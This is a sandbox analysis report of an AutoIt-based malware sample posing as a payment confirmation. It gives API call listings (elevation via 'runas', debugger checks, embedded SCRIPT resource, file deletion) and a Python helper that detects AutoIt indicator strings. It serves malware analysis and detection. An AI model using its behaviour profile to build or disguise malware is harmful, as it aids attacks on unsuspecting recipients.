                                          control_flow_graph 641 130bdf6-130be33 call 1310650 644 130be35-130be37 641->644 645 130be3c-130be3e 641->645 646 130c613-130c61f call 130b4bf 644->646 647 130be40-130be5a call 130886a call 130889e call 1307aa0 645->647 648 130be5f-130be8c 645->648 647->646 649 130be93-130be9a 648->649 650 130be8e-130be91 648->650 655 130beb8 649->655 656 130be9c-130beb3 call 130886a call 130889e call 1307aa0 649->656 650->649 654 130bebe-130bec3 650->654 659 130bed2-130bee0 call 13149a2 654->659 660 130bec5-130becf call 13105df 654->660 655->654 690 130c604-130c607 656->690 671 130bee6-130bef8 659->671 672 130c1fe-130c210 659->672 660->659 671->672 674 130befe-130bf36 call 130869d GetConsoleMode 671->674 675 130c216-130c226 672->675 676 130c56b-130c588 WriteFile 672->676 674->672 697 130bf3c-130bf42 674->697 681 130c22c-130c237 675->681 682 130c30d-130c312 675->682 678 130c594-130c59a GetLastError 676->678 679 130c58a-130c592 676->679 684 130c59c 678->684 679->684 688 130c23d-130c24d 681->688 689 130c5ce-130c5e6 681->689 685 130c416-130c421 682->685 686 130c318-130c321 682->686 694 130c5a2-130c5a4 684->694 685->689 693 130c427 685->693 686->689 695 130c327 686->695 698 130c253-130c256 688->698 691 130c5f1-130c601 call 130889e call 130886a 689->691 692 130c5e8-130c5eb 689->692 696 130c611-130c612 690->696 691->690 692->691 699 130c5ed-130c5ef 692->699 700 130c431-130c446 693->700 702 130c5a6-130c5a8 694->702 703 130c609-130c60f 694->703 704 130c331-130c348 695->704 696->646 705 130bf44-130bf46 697->705 706 130bf4c-130bf6f GetConsoleCP 697->706 707 130c258-130c271 698->707 708 130c29c-130c2d3 WriteFile 698->708 699->696 710 130c44c-130c44e 700->710 702->689 712 130c5aa-130c5af 702->712 703->696 713 130c34e-130c351 704->713 705->672 705->706 714 130c1f3-130c1f9 706->714 715 130bf75-130bf7d 706->715 716 130c273-130c27d 707->716 717 130c27e-130c29a 707->717 708->678 709 130c2d9-130c2eb 708->709 709->694 718 130c2f1-130c302 709->718 719 
130c450-130c466 710->719 720 130c48b-130c4cc WideCharToMultiByte 710->720 722 130c5b1-130c5c3 call 130889e call 130886a 712->722 723 130c5c5-130c5cc call 130887d 712->723 724 130c391-130c3da WriteFile 713->724 725 130c353-130c369 713->725 714->702 726 130bf87-130bf89 715->726 716->717 717->698 717->708 718->688 729 130c308 718->729 730 130c468-130c477 719->730 731 130c47a-130c489 719->731 720->678 733 130c4d2-130c4d4 720->733 722->690 723->690 724->678 738 130c3e0-130c3f8 724->738 735 130c380-130c38f 725->735 736 130c36b-130c37d 725->736 727 130c11e-130c121 726->727 728 130bf8f-130bfb1 726->728 741 130c123-130c126 727->741 742 130c128-130c155 727->742 739 130bfb3-130bfc8 728->739 740 130bfca-130bfd6 call 13022a8 728->740 729->694 730->731 731->710 731->720 743 130c4da-130c50d WriteFile 733->743 735->713 735->724 736->735 738->694 746 130c3fe-130c40b 738->746 748 130c024-130c036 call 1314ea7 739->748 761 130bfd8-130bfec 740->761 762 130c01c-130c01e 740->762 741->742 750 130c15b-130c15e 741->750 742->750 751 130c52d-130c541 GetLastError 743->751 752 130c50f-130c529 743->752 746->704 747 130c411 746->747 747->694 772 130c1e8-130c1ee 748->772 773 130c03c 748->773 755 130c160-130c163 750->755 756 130c165-130c178 call 1316634 750->756 760 130c547-130c549 751->760 752->743 758 130c52b 752->758 755->756 763 130c1ba-130c1bd 755->763 756->678 775 130c17e-130c188 756->775 758->760 760->684 766 130c54b-130c563 760->766 769 130bff2-130c007 call 1314ea7 761->769 770 130c1c5-130c1e0 761->770 762->748 763->726 768 130c1c3 763->768 766->700 767 130c569 766->767 767->694 768->772 769->772 783 130c00d-130c01a 769->783 770->772 772->684 776 130c042-130c077 WideCharToMultiByte 773->776 779 130c18a-130c1a1 call 1316634 775->779 780 130c1ae-130c1b4 775->780 776->772 777 130c07d-130c0a3 WriteFile 776->777 777->678 782 130c0a9-130c0c1 777->782 779->678 786 130c1a7-130c1a8 779->786 780->763 782->772 785 130c0c7-130c0ce 782->785 783->776 785->780 787 130c0d4-130c0ff WriteFile 785->787 
786->780 787->678 788 130c105-130c10c 787->788 788->772 789 130c112-130c119 788->789 789->780
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 67210c60182ac3e37decc3429310f9e89094144367aeec5b81e10f60697ea1f2
                                          • Instruction ID: 9e92ad8ba87fc701e5947484a939d6d26f343efead1a755d8aed9eeade7e7f21
                                          • Opcode Fuzzy Hash: 67210c60182ac3e37decc3429310f9e89094144367aeec5b81e10f60697ea1f2
                                          • Instruction Fuzzy Hash: 3E325C75B022298FDB26CF59DC906E9B7F9FB46314F0841D9E50AA7A84D7309E80CF52

                                          Control-flow Graph

                                          APIs
                                          • GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 012E376D
                                            • Part of subcall function 012E4257: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Payment confirmation 20240911.exe,00000104,?,00000000,00000001,00000000), ref: 012E428C
                                          • IsDebuggerPresent.KERNEL32(?,?), ref: 012E377F
                                          • GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\Payment confirmation 20240911.exe,00000104,?,013A1120,C:\Users\user\Desktop\Payment confirmation 20240911.exe,013A1124,?,?), ref: 012E37EE
                                            • Part of subcall function 012E34F3: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 012E352A
                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 012E3860
                                          • MessageBoxA.USER32 ref: 013521C5
                                          • SetCurrentDirectoryW.KERNEL32(?,?), ref: 013521FD
                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?), ref: 01352232
                                          • GetForegroundWindow.USER32 ref: 01352290
                                          • ShellExecuteW.SHELL32(00000000), ref: 01352297
                                            • Part of subcall function 012E30A5: GetSysColorBrush.USER32 ref: 012E30B0
                                            • Part of subcall function 012E30A5: LoadCursorW.USER32 ref: 012E30BF
                                            • Part of subcall function 012E30A5: LoadIconW.USER32 ref: 012E30D5
                                            • Part of subcall function 012E30A5: LoadIconW.USER32 ref: 012E30E7
                                            • Part of subcall function 012E30A5: LoadIconW.USER32 ref: 012E30F9
                                            • Part of subcall function 012E30A5: RegisterClassExW.USER32(?), ref: 012E3167
                                            • Part of subcall function 012E2E9D: CreateWindowExW.USER32 ref: 012E2ECB
                                            • Part of subcall function 012E2E9D: CreateWindowExW.USER32 ref: 012E2EEC
                                            • Part of subcall function 012E2E9D: ShowWindow.USER32(00000000), ref: 012E2F00
                                            • Part of subcall function 012E2E9D: ShowWindow.USER32(00000000), ref: 012E2F09
                                            • Part of subcall function 012E3598: _memset.LIBCMT ref: 012E35BE
                                            • Part of subcall function 012E3598: Shell_NotifyIconW.SHELL32(00000000,?), ref: 012E3667
                                          Strings
                                          • This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support., xrefs: 013521BE
                                          • runas, xrefs: 0135228B
                                          • C:\Users\user\Desktop\Payment confirmation 20240911.exe, xrefs: 012E37B4, 012E37E9, 012E37FD, 01352257
                                          Similarity
                                          • API ID: Window$IconLoadName$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                          • String ID: C:\Users\user\Desktop\Payment confirmation 20240911.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                          • API String ID: 4253510256-3990037821
                                          • Opcode ID: 0ed0dfd9a83378812cdcf58f3687b8923d2f7587a39515f596bca45c897bcc2f
                                          • Instruction ID: 4daebee0a3bc66545d7c3ef61635f92492fa40ada40244ee10a3b7cbf54ec546
                                          • Opcode Fuzzy Hash: 0ed0dfd9a83378812cdcf58f3687b8923d2f7587a39515f596bca45c897bcc2f
                                          • Instruction Fuzzy Hash: 4A514574754246BADF20EBE5DC4AFBE7FFCEB15749F80006AE68193284CB605545CB21

                                          Control-flow Graph

                                          APIs
                                          • GetVersionExW.KERNEL32(?), ref: 012FE4A7
                                            • Part of subcall function 012E7E53: _memmove.LIBCMT ref: 012E7EB9
                                          • GetCurrentProcess.KERNEL32(00000000,0137DC28,?,?), ref: 012FE567
                                          • GetNativeSystemInfo.KERNEL32(?,0137DC28,?,?), ref: 012FE5BC
                                          • FreeLibrary.KERNEL32(00000000,?,?), ref: 012FE5C7
                                          • FreeLibrary.KERNEL32(00000000,?,?), ref: 012FE5DA
                                          • GetSystemInfo.KERNEL32(?,0137DC28,?,?), ref: 012FE5E4
                                          • GetSystemInfo.KERNEL32(?,0137DC28,?,?), ref: 012FE5F0
                                          Similarity
                                          • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion_memmove
                                          • String ID:
                                          • API String ID: 2717633055-0
                                          • Opcode ID: d332da971fdbc93ca89621c448927bebbd27ece76468efb215d08b8e3d7d7608
                                          • Instruction ID: cc8859de4a635cf3763b7f4f16288a2d7560caa2345fd6b0d5f9d1a2167ce706
                                          • Opcode Fuzzy Hash: d332da971fdbc93ca89621c448927bebbd27ece76468efb215d08b8e3d7d7608
                                          • Instruction Fuzzy Hash: E561D3B18293C4CFCF16CF68A4C55EABFB46F2A204F1A45EDD9449B31BE624C508CB65

                                          Control-flow Graph

                                          APIs
                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 012E3202
                                          • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000), ref: 012E3219
                                          • LoadResource.KERNEL32(?,00000000), ref: 013557D7
                                          • SizeofResource.KERNEL32(?,00000000), ref: 013557EC
                                          • LockResource.KERNEL32(?), ref: 013557FF
                                          Similarity
                                          • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                          • String ID: SCRIPT
                                          • API String ID: 3051347437-3967369404
                                          • Opcode ID: cd0a4e6d202b2630a4ad0bc8d7a08337b66828a38db74d5d6c6694bd4e2a0a00
                                          • Instruction ID: 744125aa734dde8e2cf68a0a23aa3577918fc071501294d472d5637af38973e6
                                          • Opcode Fuzzy Hash: cd0a4e6d202b2630a4ad0bc8d7a08337b66828a38db74d5d6c6694bd4e2a0a00
                                          • Instruction Fuzzy Hash: 4F115A70210701BFE7219BA5EC48F277BBDFBC9B52F108428F68687250DA71DC00CA60
                                          APIs
                                          • GetFileAttributesW.KERNEL32(012EC848,012EC848), ref: 012FDDA2
                                          • FindFirstFileW.KERNEL32(012EC848,?), ref: 01354A83
                                          Similarity
                                          • API ID: File$AttributesFindFirst
                                          • String ID:
                                          • API String ID: 4185537391-0
                                          • Opcode ID: 5f0131ece3af3a2b1ac4da66b180dafdf4511ff141ac6ab506e417c60359a942
                                          • Instruction ID: 36fdc702f80f7c47fea871e843719ce17cb0ea1966d051f31a6889b415b72e8e
                                          • Opcode Fuzzy Hash: 5f0131ece3af3a2b1ac4da66b180dafdf4511ff141ac6ab506e417c60359a942
                                          • Instruction Fuzzy Hash: 6CE0923252440597D26467BC9C0E8A97A9C9A0533CF104719F975C10E0E7B0994086D6
                                          APIs
                                          • SetUnhandledExceptionFilter.KERNEL32 ref: 01308E1F
                                          Similarity
                                          • API ID: ExceptionFilterUnhandled
                                          • String ID:
                                          • API String ID: 3192549508-0
                                          • Opcode ID: 7c32607c0566924eafb31c19484fb89d080020e3b6c1c095d94ee6ce59d30629
                                          • Instruction ID: e4fa8b2b9d08d4ab26034c03ccd379f0f9ffaec90c92a79e90350a8dfe0faf2a
                                          • Opcode Fuzzy Hash: 7c32607c0566924eafb31c19484fb89d080020e3b6c1c095d94ee6ce59d30629
                                          • Instruction Fuzzy Hash: 46A01130000A0CABCA002AA2E808888BFACEA082A0B008020F80C000228B33A8208A88
                                          APIs
                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 012EE279
                                          • timeGetTime.WINMM ref: 012EE51A
                                          • TranslateMessage.USER32(?), ref: 012EE646
                                          • DispatchMessageW.USER32(?), ref: 012EE651
                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 012EE664
                                          • LockWindowUpdate.USER32(00000000), ref: 012EE697
                                          • DestroyWindow.USER32 ref: 012EE6A3
                                          • GetMessageW.USER32 ref: 012EE6BD
                                          • Sleep.KERNEL32(0000000A), ref: 01355B15
                                          • TranslateMessage.USER32(?), ref: 013562AF
                                          • DispatchMessageW.USER32(?), ref: 013562BD
                                          • GetMessageW.USER32 ref: 013562D1
                                          Similarity
                                          • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                          • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                          • API String ID: 2641332412-570651680
                                          • Opcode ID: b8fcff9bdafbc7ce437aa7d5d19d035afa55746f406cd19527d143d4d06b0fa2
                                          • Instruction ID: eafac51b6dbe2d17741f82d3a9186117dac4b74f3f0f2327a9baaa2a2b30d167
                                          • Opcode Fuzzy Hash: b8fcff9bdafbc7ce437aa7d5d19d035afa55746f406cd19527d143d4d06b0fa2
                                          • Instruction Fuzzy Hash: 28622A70514341CFEB25DF68C888FAA7BE8BF45708F44497DEA468B295D7B0E848CB52
                                          APIs
                                          • ___createFile.LIBCMT ref: 01316C73
                                          • ___createFile.LIBCMT ref: 01316CB4
                                          • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 01316CDD
                                          • __dosmaperr.LIBCMT ref: 01316CE4
                                          • GetFileType.KERNEL32 ref: 01316CF7
                                          • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 01316D1A
                                          • __dosmaperr.LIBCMT ref: 01316D23
                                          • CloseHandle.KERNEL32(00000000), ref: 01316D2C
                                          • __set_osfhnd.LIBCMT ref: 01316D5C
                                          • __lseeki64_nolock.LIBCMT ref: 01316DC6
                                          • __close_nolock.LIBCMT ref: 01316DEC
                                          • __chsize_nolock.LIBCMT ref: 01316E1C
                                          • __lseeki64_nolock.LIBCMT ref: 01316E2E
                                          • __lseeki64_nolock.LIBCMT ref: 01316F26
                                          • __lseeki64_nolock.LIBCMT ref: 01316F3B
                                          • __close_nolock.LIBCMT ref: 01316F9B
                                            • Part of subcall function 0130F84C: CloseHandle.KERNEL32(00000000), ref: 0130F89C
                                            • Part of subcall function 0130F84C: GetLastError.KERNEL32(?,01316DF1,0138EEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0130F8A6
                                            • Part of subcall function 0130F84C: __free_osfhnd.LIBCMT ref: 0130F8B3
                                            • Part of subcall function 0130F84C: __dosmaperr.LIBCMT ref: 0130F8D5
                                            • Part of subcall function 0130889E: __getptd_noexit.LIBCMT ref: 0130889E
                                          • __lseeki64_nolock.LIBCMT ref: 01316FBD
                                          • CloseHandle.KERNEL32(00000000), ref: 013170F2
                                          • ___createFile.LIBCMT ref: 01317111
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0131711E
                                          • __dosmaperr.LIBCMT ref: 01317125
                                          • __free_osfhnd.LIBCMT ref: 01317145
                                          • __invoke_watson.LIBCMT ref: 01317173
                                          • __wsopen_helper.LIBCMT ref: 0131718D
                                          Similarity
                                          • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                          • String ID: @
                                          • API String ID: 3896587723-2766056989
                                          • Opcode ID: d52801ef46d82f45abb6ee8d36471eb1083ef00a5aff7207d63c1b57a06d7712
                                          • Instruction ID: c10b6b4b423740a641ed812764a20c4125f53373f250e66c04fb1df5616e612d
                                          • Opcode Fuzzy Hash: d52801ef46d82f45abb6ee8d36471eb1083ef00a5aff7207d63c1b57a06d7712
                                          • Instruction Fuzzy Hash: 982227B1D0020A9BFF2E8EACDC527BD7F65EB0432CF188269E611972D9C7B58950C751

                                          Control-flow Graph

                                          APIs
                                          • _wcscpy.LIBCMT ref: 0133026A
                                          • _wcschr.LIBCMT ref: 01330278
                                          • _wcscpy.LIBCMT ref: 0133028F
                                          • _wcscat.LIBCMT ref: 0133029E
                                          • _wcscat.LIBCMT ref: 013302BC
                                          • _wcscpy.LIBCMT ref: 013302DD
                                          • __wsplitpath.LIBCMT ref: 013303BA
                                          • _wcscpy.LIBCMT ref: 013303DF
                                          • _wcscpy.LIBCMT ref: 013303F1
                                          • _wcscpy.LIBCMT ref: 01330406
                                          • _wcscat.LIBCMT ref: 0133041B
                                          • _wcscat.LIBCMT ref: 0133042D
                                          • _wcscat.LIBCMT ref: 01330442
                                            • Part of subcall function 0132C890: _wcscmp.LIBCMT ref: 0132C92A
                                            • Part of subcall function 0132C890: __wsplitpath.LIBCMT ref: 0132C96F
                                            • Part of subcall function 0132C890: _wcscpy.LIBCMT ref: 0132C982
                                            • Part of subcall function 0132C890: _wcscat.LIBCMT ref: 0132C995
                                            • Part of subcall function 0132C890: __wsplitpath.LIBCMT ref: 0132C9BA
                                            • Part of subcall function 0132C890: _wcscat.LIBCMT ref: 0132C9D0
                                            • Part of subcall function 0132C890: _wcscat.LIBCMT ref: 0132C9E3
                                          Similarity
                                          • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                          • String ID: >>>AUTOIT SCRIPT<<<
                                          • API String ID: 2955681530-2806939583
                                          • Opcode ID: eb8b5d7b3a6de602aafe9c250d0521c7e656b3e3e72f22508b1c8bc36bce86ff
                                          • Instruction ID: bcf7ee0e7c02f2b5aff5588c997f4903b7057776e6c26a460eb8804f9d3abec1
                                          • Opcode Fuzzy Hash: eb8b5d7b3a6de602aafe9c250d0521c7e656b3e3e72f22508b1c8bc36bce86ff
                                          • Instruction Fuzzy Hash: 3991B371104706AFCB25EB58C854FABB3E8FF94318F04485DF58997291EB34EA48CB96

                                          Control-flow Graph

                                          APIs
                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Payment confirmation 20240911.exe,00000104,?,00000000,00000001,00000000), ref: 012E428C
                                            • Part of subcall function 012ECAEE: _memmove.LIBCMT ref: 012ECB2F
                                            • Part of subcall function 01301BC7: __wcsicmp_l.LIBCMT ref: 01301C50
                                          • _wcscpy.LIBCMT ref: 012E43C0
                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Payment confirmation 20240911.exe,00000104,?,?,?,?,00000000,CMDLINE,?,?,00000100,00000000,CMDLINE,?,?), ref: 0135214E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: FileModuleName$__wcsicmp_l_memmove_wcscpy
                                          • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\Desktop\Payment confirmation 20240911.exe$CMDLINE$CMDLINERAW
                                          • API String ID: 861526374-2635015396
                                          • Opcode ID: 673990977375ef42e2edecc71001dd74dd499040a51db12c4bc9f3c53e944e65
                                          • Instruction ID: 387a4733ec191b56113c5eeccd10442949612613ff475fcda939f2b909c10cfa
                                          • Opcode Fuzzy Hash: 673990977375ef42e2edecc71001dd74dd499040a51db12c4bc9f3c53e944e65
                                          • Instruction Fuzzy Hash: 1181727692014AAACB15EBE4D958DFFB7FCEF25354F900019D541B7180EB70AB05CBA1
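                                          The two functions above expose the AutoIt v3 runtime's own strings: the ">>>AUTOIT SCRIPT<<<" marker and the /AutoIt3ExecuteScript, /AutoIt3ExecuteLine, /AutoIt3OutputDebug and CMDLINE command-line handling. Together with the "Software\AutoIt v3\AutoIt" Include lookup further down, they are consistent with a compiled AutoIt stub (the report's detection verdict is FormBook). The helper below is an added triage example, not part of the Joe Sandbox report or of the sample: it locates those indicators in a raw memory dump or on-disk image, searching each one in both ASCII and the UTF-16LE form that the *W APIs listed above operate on, since in a process dump the wide form is what you will actually find. The indicator list is taken from the String ID fields of this report; the sample buffer is constructed for the example and is not data from the analysed file, and the two-indicator threshold is an assumption chosen for illustration.

```python
"""Locate AutoIt v3 runtime indicator strings in a raw memory dump or PE image.

Added triage helper; not part of the Joe Sandbox report. The indicator list is
taken from the String ID fields shown in the report's function listings. The
sample buffer at the bottom is constructed for this example, not dumped data.
"""
from __future__ import annotations

import re
from typing import Dict, List, Tuple

# Strings observed in the report's disassembly blocks (String ID fields).
AUTOIT_INDICATORS = [
    ">>>AUTOIT SCRIPT<<<",
    "/AutoIt3ExecuteLine",
    "/AutoIt3ExecuteScript",
    "/AutoIt3OutputDebug",
    "/ErrorStdOut",
    "CMDLINERAW",
    "Software\\AutoIt v3\\AutoIt",
    "AutoIt v3",
]


def _patterns(indicator: str) -> Dict[str, bytes]:
    """Both encodings an indicator takes in a Windows process image:
    narrow ASCII and the UTF-16LE consumed by the *W APIs seen in the report."""
    return {
        "ascii": indicator.encode("ascii"),
        "utf-16le": indicator.encode("utf-16-le"),
    }


def scan_for_autoit(data: bytes) -> Dict[str, List[Tuple[str, int]]]:
    """Return {indicator: [(encoding, offset), ...]} for every hit in `data`.

    Patterns are escaped so the NUL bytes of the UTF-16LE form are matched
    literally; offsets are byte offsets into `data`."""
    hits: Dict[str, List[Tuple[str, int]]] = {}
    for indicator in AUTOIT_INDICATORS:
        for encoding, pattern in _patterns(indicator).items():
            for match in re.finditer(re.escape(pattern), data):
                hits.setdefault(indicator, []).append((encoding, match.start()))
    return hits


def looks_like_autoit_runtime(data: bytes, min_distinct: int = 2) -> bool:
    """Heuristic (threshold is an assumption for this example): a compiled
    AutoIt stub carries several of these markers together, so require at
    least `min_distinct` different indicators before flagging the buffer."""
    return len(scan_for_autoit(data)) >= min_distinct


# Constructed sample: NUL filler around two wide-string markers and one ASCII marker.
SAMPLE = (
    b"\x00" * 16
    + "/AutoIt3ExecuteScript".encode("utf-16-le")   # offset 16, 42 bytes
    + b"\x00" * 8
    + b">>>AUTOIT SCRIPT<<<"                          # offset 66, 19 bytes
    + b"\x00" * 8
    + "Software\\AutoIt v3\\AutoIt".encode("utf-16-le")  # offset 93
)

if __name__ == "__main__":
    for indicator, where in scan_for_autoit(SAMPLE).items():
        for encoding, offset in where:
            print(f"{offset:#010x} {encoding:9s} {indicator}")
    print("AutoIt runtime markers present:", looks_like_autoit_runtime(SAMPLE))
```

                                          Note that "AutoIt v3" is a substring of the registry path, so the scanner reports it inside "Software\AutoIt v3\AutoIt" as well; when building a rule from these strings, anchor on the longer indicators to avoid double counting.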

                                          Control-flow Graph

                                          APIs
                                            • Part of subcall function 0132C6A0: __time64.LIBCMT ref: 0132C6AA
                                            • Part of subcall function 012E41A7: _fseek.LIBCMT ref: 012E41BF
                                          • __wsplitpath.LIBCMT ref: 0132C96F
                                            • Part of subcall function 0130297D: __wsplitpath_helper.LIBCMT ref: 013029BD
                                          • _wcscpy.LIBCMT ref: 0132C982
                                          • _wcscat.LIBCMT ref: 0132C995
                                          • __wsplitpath.LIBCMT ref: 0132C9BA
                                          • _wcscat.LIBCMT ref: 0132C9D0
                                          • _wcscat.LIBCMT ref: 0132C9E3
                                            • Part of subcall function 0132C6E4: _memmove.LIBCMT ref: 0132C71D
                                            • Part of subcall function 0132C6E4: _memmove.LIBCMT ref: 0132C72C
                                          • _wcscmp.LIBCMT ref: 0132C92A
                                            • Part of subcall function 0132CE59: _wcscmp.LIBCMT ref: 0132CF49
                                            • Part of subcall function 0132CE59: _wcscmp.LIBCMT ref: 0132CF5C
                                          • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0132CB8D
                                          • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0132CC24
                                          • CopyFileW.KERNEL32 ref: 0132CC3A
                                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0132CC4B
                                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0132CC5D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                          • String ID:
                                          • API String ID: 152968663-0
                                          • Opcode ID: b8935b988977260003014caee490069b4d837486cbf4a88eccc92fcd8da1f73a
                                          • Instruction ID: ca6052f34c31bfa31902a6fde03de174e2c901307ad7c60ac007b6d3b31795ca
                                          • Opcode Fuzzy Hash: b8935b988977260003014caee490069b4d837486cbf4a88eccc92fcd8da1f73a
                                          • Instruction Fuzzy Hash: 29C10EB1E00129AEDF11EF99CC84EEEB7BDEF59254F0040AAE609E7150D7709A84CF65

                                          Control-flow Graph

                                          APIs
                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 012FEA39
                                          • __wsplitpath.LIBCMT ref: 012FEA56
                                            • Part of subcall function 0130297D: __wsplitpath_helper.LIBCMT ref: 013029BD
                                          • _wcsncat.LIBCMT ref: 012FEA69
                                          • __makepath.LIBCMT ref: 012FEA85
                                            • Part of subcall function 01302BFF: __wmakepath_s.LIBCMT ref: 01302C13
                                            • Part of subcall function 0130010A: std::exception::exception.LIBCMT ref: 0130013E
                                            • Part of subcall function 0130010A: __CxxThrowException@8.LIBCMT ref: 01300153
                                          • _wcscpy.LIBCMT ref: 012FEABE
                                            • Part of subcall function 012FEB05: RegOpenKeyExW.KERNEL32 ref: 012FEB27
                                          • _wcscat.LIBCMT ref: 013532FC
                                          • _wcscat.LIBCMT ref: 01353334
                                          • _wcsncpy.LIBCMT ref: 01353370
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: _wcscat$Exception@8FileModuleNameOpenThrow__makepath__wmakepath_s__wsplitpath__wsplitpath_helper_wcscpy_wcsncat_wcsncpystd::exception::exception
                                          • String ID: Include$\
                                          • API String ID: 1213536620-3429789819
                                          • Opcode ID: 2b6c0ec4afb702444268d8f2e145f80a5c9db86b831b80ea7f678a82c3c71bbe
                                          • Instruction ID: c4c958c9e5a8e7f935e1785bdcb3f2bbe34bddbdb12f2550ca3fa7a0955fd1d8
                                          • Opcode Fuzzy Hash: 2b6c0ec4afb702444268d8f2e145f80a5c9db86b831b80ea7f678a82c3c71bbe
                                          • Instruction Fuzzy Hash: D55180B5404341ABC729EF59E894CA7B7ECFB5A304FC0492EF94583294EB709648CB66

                                          Control-flow Graph

                                          • Control-flow graph (basic blocks 12e29c2-12e2ac5 and 13522aa-13523a9): a window procedure that dispatches on the incoming message, with paths calling PostQuitMessage, SetTimer and RegisterWindowMessageW followed by CreatePopupMenu, KillTimer, MoveWindow and SetFocus, and falls through to DefWindowProcW for unhandled messages. Full block list omitted; the APIs are listed below.
                                          APIs
                                          • DefWindowProcW.USER32(?,?,?,?), ref: 012E2A33
